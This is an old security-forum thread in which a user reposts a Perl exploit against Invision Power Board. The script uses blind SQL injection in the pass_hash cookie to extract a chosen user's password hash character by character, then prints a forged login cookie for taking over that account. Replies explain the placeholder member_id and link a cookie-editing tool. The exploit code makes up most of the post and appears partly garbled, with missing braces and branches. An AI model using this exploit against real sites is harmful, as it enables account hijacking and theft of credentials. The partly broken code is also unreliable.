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IT Security and Insecurity Portal |
IPB cookies disclosure |
Posted: Sun Jul 17, 2005 10:14 am |
subzero |
Valuable expert |

Joined: Mar 16, 2005 |
Posts: 42 |
Code: | #!/usr/bin/perl -w
# This one actually works :) Just paste the outputted cookie into
# your request header using livehttpheaders or something and you
# will probably be logged in as that user. No need to decrypt it!
# Exploit coded by "ReMuSOMeGa & Nova" and http://www.h4cky0u.org
use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent("Mosiac 1.0" . $ua->agent);
if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[3]) {$ARGV[3] = '';}
my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';
my $user = $ARGV[1]; # userid to jack
my $iver = $ARGV[2]; # version 1 or 2
my $cpre = $ARGV[3]; # cookie prefix
my $dbug = $ARGV[4]; # debug?
if (!$ARGV[2])
print "..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2]. ";
my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");
my $outputs = '';
for( $i=1; $i < 33; $i++ )
for( $j=0; $j < 16; $j++ )
my $current = $charset[$j];
my $sql = ( $iver < 2 ) ? "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*" :
my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);
my $res = $ua->get($path, @cookie);
# If we get a valid sql request then this
# does not appear anywhere in the sources
$pattern = '<title>(.*)Log In(.*)</title>';
$_ = $res->content;
if ($dbug) { print };
if ( !(/$pattern/) )
$outputs .= $current;
print "$current ";
if ( length($outputs) < 1 ) { print "Not Exploitable! "; exit; }
print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs;
# www.h4cky0u.org
source: http://downloads.securityfocus.com/vulnerabilities/exploits/invpb-cookie.pl
can someone enlighten me..
why he used this member id 31337420 ?
Code: | my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql); |
Posted: Thu Jul 21, 2005 7:32 pm |
Narsil |
Regular user |

Joined: Jul 20, 2005 |
Posts: 5 |
he used for User id and password fake-logon.
"member_id=31337420" it could be another number
"pass_hash=" you see a blank password for the fake-member.
http://www.nirsoft.net/utils/iecv.zip nice program to modify the cookie that generate the exploit. |
Re: IPB cookies disclosure |
Posted: Thu Jul 21, 2005 7:40 pm |
waraxe |
Site admin |

Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
subzero wrote: |
can someone enlighten me..
why he used this member id 31337420 ?
Code: | my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql); |
Since sql injection occurs in "pass_hash", then "member_id" value is irrelevant  |
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